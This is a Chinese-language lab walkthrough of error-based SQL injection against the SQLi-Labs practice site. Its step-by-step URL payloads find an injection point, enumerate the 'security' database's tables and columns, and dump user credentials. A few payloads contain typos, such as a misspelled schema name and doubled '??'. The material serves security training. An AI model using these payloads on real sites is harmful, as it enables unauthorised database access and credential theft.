问SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为:
http://[靶机IP]/sqli-labs/Less-1/
登录后,根据网页提示,给定一个GET参数,即:
http://[靶机IP]/sqli-labs/Less-1/?id=1
此时页面显示id=1的用户名Dump、密码Dump。
以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。
寻找注入点
分别用以下3条payload寻找注入点及判断注入点的类型:
http://[靶机IP]/sqli-labs/Less-1/?id=1'
运行后报错!
http://[靶机IP]/sqli-labs/Less-1/?id=1' and '1'='1
运行后正常显示!
http://[靶机IP]/sqli-labs/Less-1/?id=1' and '1'='2
运行后未正常显示!
由此可以判断,网站存在字符型注入点。
获取网站当前所在所在数据库的库名
使用以下payload获取网站当前所在数据库的库名:
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from infoemation_schema.tables group by x)a)--+
显示结果为security。
获取数据库security的全部表名
使用以下payload获取数据库security的全部表名:
http://[靶机IP]/sqli-labs/Less-1/??id=-1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security第1张表名字为emails。
http://[靶机IP]/sqli-labs/Less-1/??id=-1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security第2张表名字为referers。
http://[靶机IP]/sqli-labs/Less-1/??id=-1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security第3张表名字为uagents。
http://[靶机IP]/sqli-labs/Less-1/??id=-1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示security第4张表名字为users。
获取users表的全部字段名
使用以下payload获取users表的全部字段名:
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示users表中的第1个字段名为id。
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示users表中的第2个字段名为username。
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示users表中的第3个字段名为password。
获取users表id、username和password字段的全部值。
由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示。
显示第一组数据
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat((select concat_ws(',',id,username,password) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示结果Dump, Dump。
显示第二组数据
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat((select concat_ws(',',id,username,password) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示结果Angelina,l-kill-you。
显示第三组数据
http://[靶机IP]/sqli-labs/Less-1/?id=-1' and (select 1 from (select count(*),concat((select concat_ws(',',id,username,password) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
显示结果Dummy,p@ssword。